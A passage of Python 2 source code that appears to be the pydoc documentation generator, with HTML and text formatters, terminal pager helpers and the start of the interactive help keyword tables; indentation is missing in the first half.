modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda (key, value), s=self: s.modulelink(value))
result = result + self.bigsection(
'Modules', '#fffff', '#aa55cc', contents)
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
    """Class for safely making a text representation of a Python object."""
    def __init__(self):
        Repr.__init__(self)
        # Keep the abbreviated reprs short enough for terminal output.
        self.maxlist = self.maxtuple = 20
        self.maxdict = 10
        self.maxstring = self.maxother = 100

    def repr1(self, x, level):
        # Prefer a type-specific repr_<typename> handler when one is defined.
        typename = getattr(type(x), '__name__', None)
        if typename is not None:
            handler = getattr(self, 'repr_' + join(split(typename), '_'), None)
            if handler is not None:
                return handler(x, level)
        return cram(stripid(repr(x)), self.maxother)

    def repr_string(self, x, level):
        test = cram(x, self.maxstring)
        testrepr = repr(test)
        if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
            # Backslashes are only literal in the string and are never
            # needed to make any special characters, so show a raw string.
            return 'r' + testrepr[0] + test + testrepr[0]
        return testrepr

    repr_str = repr_string

    def repr_instance(self, x, level):
        try:
            return cram(stripid(repr(x)), self.maxstring)
        except:
            # repr() of a broken object may raise anything; degrade politely.
            return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
filter(lambda t: not t[0].startswith('_'), attrs)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
    """The first time this is called, determine what kind of pager to use."""
    global pager
    # Replace this function with the concrete pager chosen for this
    # environment, then delegate the current call to it.
    chosen = getpager()
    pager = chosen
    chosen(text)
def getpager():
    """Decide what method to use for paging through text."""
    # Plain printing when stdout is not a real file object or the session
    # is not interactive (redirected output, IDE shells, etc.).
    if type(sys.stdout) is not types.FileType:
        return plainpager
    if not sys.stdin.isatty() or not sys.stdout.isatty():
        return plainpager
    # Honor an explicit $PAGER, working around platform limitations.
    if 'PAGER' in os.environ:
        if sys.platform == 'win32': # pipes completely broken in Windows
            return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
        elif os.environ.get('TERM') in ('dumb', 'emacs'):
            return lambda text: pipepager(plain(text), os.environ['PAGER'])
        else:
            return lambda text: pipepager(text, os.environ['PAGER'])
    if os.environ.get('TERM') in ('dumb', 'emacs'):
        return plainpager
    if sys.platform == 'win32' or sys.platform.startswith('os2'):
        return lambda text: tempfilepager(plain(text), 'more <')
    # Probe for 'less': os.system returns 0 if the shell found and ran it.
    if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
        return lambda text: pipepager(text, 'less')

    # Last resort: probe for 'more' by running it on an empty temporary
    # file; otherwise page within this process via ttypager.
    import tempfile
    (fd, filename) = tempfile.mkstemp()
    os.close(fd)
    try:
        if hasattr(os, 'system') and os.system('more %s' % filename) == 0:
            return lambda text: pipepager(text, 'more')
        else:
            return ttypager
    finally:
        os.unlink(filename)
def plain(text):
    """Remove boldface formatting from text."""
    # Overstruck bold is rendered as "X\bX": drop every character that is
    # immediately followed by a backspace, leaving the plain character.
    overstrike = '.\b'
    return re.sub(overstrike, '', text)
def pipepager(text, cmd):
    """Page through text by feeding it to another program."""
    # os.popen gives us the pager process's stdin as a writable file object.
    pipe = os.popen(cmd, 'w')
    try:
        pipe.write(text)
        pipe.close()
    except IOError:
        pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
    """Page through text by invoking a program on a temporary file."""
    import tempfile
    # mkstemp (not the deprecated, race-prone mktemp) creates and opens the
    # file atomically; getpager() above uses the same idiom for its probe.
    (fd, filename) = tempfile.mkstemp()
    file = os.fdopen(fd, 'w')
    try:
        file.write(text)
    finally:
        file.close()
    try:
        os.system(cmd + ' ' + filename)
    finally:
        os.unlink(filename)
def ttypager(text):
    """Page through text on a text terminal."""
    lines = split(plain(text), '\n')
    try:
        # Switch the terminal to cbreak mode so single keypresses are
        # delivered immediately; fall back to line-based input elsewhere.
        import tty
        fd = sys.stdin.fileno()
        old = tty.tcgetattr(fd)
        tty.setcbreak(fd)
        getchar = lambda: sys.stdin.read(1)
    except (ImportError, AttributeError):
        tty = None
        getchar = lambda: sys.stdin.readline()[:-1][:1]

    try:
        # $LINES arrives from the environment as a *string*; subtracting 1
        # from it directly (as before) raised TypeError whenever it was set.
        r = inc = int(os.environ.get('LINES', 25)) - 1
        sys.stdout.write(join(lines[:inc], '\n') + '\n')
        while lines[r:]:
            sys.stdout.write('-- more --')
            sys.stdout.flush()
            c = getchar()

            if c in ('q', 'Q'):
                # Ten spaces blank out the ten-character '-- more --' prompt.
                sys.stdout.write('\r          \r')
                break
            elif c in ('\r', '\n'):
                sys.stdout.write('\r          \r' + lines[r] + '\n')
                r = r + 1
                continue
            if c in ('b', 'B', '\x1b'):
                r = r - inc - inc
                if r < 0: r = 0
            sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
            r = r + inc

    finally:
        if tty:
            tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
    """Simply print unformatted text.  This is the ultimate fallback."""
    stripped = plain(text)
    sys.stdout.write(stripped)
def describe(thing):
    """Produce a short description of the given thing."""
    if inspect.ismodule(thing):
        # Builtin C modules, packages, and plain modules read differently.
        if thing.__name__ in sys.builtin_module_names:
            return 'built-in module ' + thing.__name__
        if hasattr(thing, '__path__'):
            return 'package ' + thing.__name__
        return 'module ' + thing.__name__
    if inspect.isbuiltin(thing):
        return 'built-in function ' + thing.__name__
    # Both descriptor kinds are qualified by their owning class.
    for check, label in ((inspect.isgetsetdescriptor, 'getset descriptor'),
                         (inspect.ismemberdescriptor, 'member descriptor')):
        if check(thing):
            owner = thing.__objclass__
            return '%s %s.%s.%s' % (label, owner.__module__,
                                    owner.__name__, thing.__name__)
    if inspect.isclass(thing):
        return 'class ' + thing.__name__
    if inspect.isfunction(thing):
        return 'function ' + thing.__name__
    if inspect.ismethod(thing):
        return 'method ' + thing.__name__
    if type(thing) is types.InstanceType:
        # Old-style class instance (Python 2 only).
        return 'instance of ' + thing.__class__.__name__
    return type(thing).__name__
def locate(path, forceload=0):
    """Locate an object by name or dotted path, importing as necessary.

    Returns the object, or None if an attribute lookup fails along the way.
    """
    parts = [part for part in split(path, '.') if part]
    module, n = None, 0
    # Import the longest importable prefix of the dotted path.
    while n < len(parts):
        nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
        if nextmodule: module, n = nextmodule, n + 1
        else: break
    if module:
        # Resolve the remaining path components as attributes.
        object = module
        for part in parts[n:]:
            try: object = getattr(object, part)
            except AttributeError: return None
        return object
    else:
        # Nothing importable: fall back to a builtin of that name
        # (implicitly returns None when there is none).
        if hasattr(__builtin__, path):
            return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface

# Shared renderer instances used by the convenience functions below
# (doc() renders through `text`, writedoc()/serve() through `html`).
text = TextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
    """Given an object or a path to an object, get the object and its name.

    Raises ImportError when a string path cannot be located.
    """
    if isinstance(thing, str):
        object = locate(thing, forceload)
        if not object:
            raise ImportError, 'no Python documentation found for %r' % thing
        return object, thing
    else:
        # Already an object: best-effort name from __name__.
        return thing, getattr(thing, '__name__', None)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
    """Display text documentation, given an object or a path to an object."""
    try:
        object, name = resolve(thing, forceload)
        desc = describe(object)
        module = inspect.getmodule(object)
        # Qualify the description with the containing module/prefix.
        if name and '.' in name:
            desc += ' in ' + name[:name.rfind('.')]
        elif module and module is not object:
            desc += ' in module ' + module.__name__
        if not (inspect.ismodule(object) or
                inspect.isclass(object) or
                inspect.isroutine(object) or
                inspect.isgetsetdescriptor(object) or
                inspect.ismemberdescriptor(object) or
                isinstance(object, property)):
            # If the passed object is a piece of data or an instance,
            # document its available methods instead of its value.
            object = type(object)
            desc += ' object'
        pager(title % desc + '\n\n' + text.document(object, name))
    except (ImportError, ErrorDuringImport), value:
        print value
def writedoc(thing, forceload=0):
    """Write HTML documentation to a file in the current directory.

    The output file is named '<object name>.html'. Import failures are
    reported on stdout rather than raised.
    """
    try:
        object, name = resolve(thing, forceload)
        page = html.page(describe(object), html.document(object, name))
        file = open(name + '.html', 'w')
        file.write(page)
        file.close()
        print 'wrote', name + '.html'
    except (ImportError, ErrorDuringImport), value:
        print value
def writedocs(dir, pkgpath='', done=None):
    """Write out HTML documentation for all modules in a directory tree."""
    if done is None: done = {}
    # NOTE(review): `done` is accepted for backward compatibility but never
    # consulted below — pkgutil.walk_packages drives the traversal.
    for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
        writedoc(modname)
    return
class Helper:
    """Interactive driver for the "help>" prompt.

    Reads requests from `input`, writes results to `output`, and
    dispatches keyword/topic requests to the installed HTML docs
    (when found) or object requests to doc().
    """

    # Each keyword maps either to the name of another entry to show
    # instead (a plain string) or to a (doc-file, related-topics) pair.
    keywords = {
        'and': 'BOOLEAN',
        'as': 'with',
        'assert': ('ref/assert', ''),
        'break': ('ref/break', 'while for'),
        'class': ('ref/class', 'CLASSES SPECIALMETHODS'),
        'continue': ('ref/continue', 'while for'),
        'def': ('ref/function', ''),
        'del': ('ref/del', 'BASICMETHODS'),
        'elif': 'if',
        'else': ('ref/if', 'while for'),
        'except': 'try',
        'exec': ('ref/exec', ''),
        'finally': 'try',
        'for': ('ref/for', 'break continue while'),
        'from': 'import',
        'global': ('ref/global', 'NAMESPACES'),
        'if': ('ref/if', 'TRUTHVALUE'),
        'import': ('ref/import', 'MODULES'),
        'in': ('ref/comparisons', 'SEQUENCEMETHODS2'),
        'is': 'COMPARISON',
        'lambda': ('ref/lambdas', 'FUNCTIONS'),
        'not': 'BOOLEAN',
        'or': 'BOOLEAN',
        'pass': ('ref/pass', ''),
        'print': ('ref/print', ''),
        'raise': ('ref/raise', 'EXCEPTIONS'),
        'return': ('ref/return', 'FUNCTIONS'),
        'try': ('ref/try', 'EXCEPTIONS'),
        'while': ('ref/while', 'break continue if TRUTHVALUE'),
        'with': ('ref/with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
        'yield': ('ref/yield', ''),
    }

    # Same shape as `keywords`, for general help topics.
    topics = {
        'TYPES': ('ref/types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS FUNCTIONS CLASSES MODULES FILES inspect'),
        'STRINGS': ('ref/strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING TYPES'),
        'STRINGMETHODS': ('lib/string-methods', 'STRINGS FORMATTING'),
        'FORMATTING': ('lib/typesseq-strings', 'OPERATORS'),
        'UNICODE': ('ref/strings', 'encodings unicode SEQUENCES STRINGMETHODS FORMATTING TYPES'),
        'NUMBERS': ('ref/numbers', 'INTEGER FLOAT COMPLEX TYPES'),
        'INTEGER': ('ref/integers', 'int range'),
        'FLOAT': ('ref/floating', 'float math'),
        'COMPLEX': ('ref/imaginary', 'complex cmath'),
        'SEQUENCES': ('lib/typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
        'MAPPINGS': 'DICTIONARIES',
        'FUNCTIONS': ('lib/typesfunctions', 'def TYPES'),
        'METHODS': ('lib/typesmethods', 'class def CLASSES TYPES'),
        'CODEOBJECTS': ('lib/bltin-code-objects', 'compile FUNCTIONS TYPES'),
        'TYPEOBJECTS': ('lib/bltin-type-objects', 'types TYPES'),
        'FRAMEOBJECTS': 'TYPES',
        'TRACEBACKS': 'TYPES',
        'NONE': ('lib/bltin-null-object', ''),
        'ELLIPSIS': ('lib/bltin-ellipsis-object', 'SLICINGS'),
        'FILES': ('lib/bltin-file-objects', ''),
        'SPECIALATTRIBUTES': ('lib/specialattrs', ''),
        'CLASSES': ('ref/types', 'class SPECIALMETHODS PRIVATENAMES'),
        'MODULES': ('lib/typesmodules', 'import'),
        'PACKAGES': 'import',
        'EXPRESSIONS': ('ref/summary', 'lambda or and not in is BOOLEAN COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES LISTS DICTIONARIES BACKQUOTES'),
        'OPERATORS': 'EXPRESSIONS',
        'PRECEDENCE': 'EXPRESSIONS',
        'OBJECTS': ('ref/objects', 'TYPES'),
        'SPECIALMETHODS': ('ref/specialnames', 'BASICMETHODS ATTRIBUTEMETHODS CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
        'BASICMETHODS': ('ref/customization', 'cmp hash repr str SPECIALMETHODS'),
        'ATTRIBUTEMETHODS': ('ref/attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
        'CALLABLEMETHODS': ('ref/callable-types', 'CALLS SPECIALMETHODS'),
        'SEQUENCEMETHODS1': ('ref/sequence-types', 'SEQUENCES SEQUENCEMETHODS2 SPECIALMETHODS'),
        'SEQUENCEMETHODS2': ('ref/sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 SPECIALMETHODS'),
        'MAPPINGMETHODS': ('ref/sequence-types', 'MAPPINGS SPECIALMETHODS'),
        'NUMBERMETHODS': ('ref/numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT SPECIALMETHODS'),
        'EXECUTION': ('ref/execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
        'NAMESPACES': ('ref/naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
        'DYNAMICFEATURES': ('ref/dynamic-features', ''),
        'SCOPING': 'NAMESPACES',
        'FRAMES': 'NAMESPACES',
        'EXCEPTIONS': ('ref/exceptions', 'try except finally raise'),
        'COERCIONS': ('ref/coercion-rules','CONVERSIONS'),
        'CONVERSIONS': ('ref/conversions', 'COERCIONS'),
        'IDENTIFIERS': ('ref/identifiers', 'keywords SPECIALIDENTIFIERS'),
        'SPECIALIDENTIFIERS': ('ref/id-classes', ''),
        'PRIVATENAMES': ('ref/atom-identifiers', ''),
        'LITERALS': ('ref/atom-literals', 'STRINGS BACKQUOTES NUMBERS TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
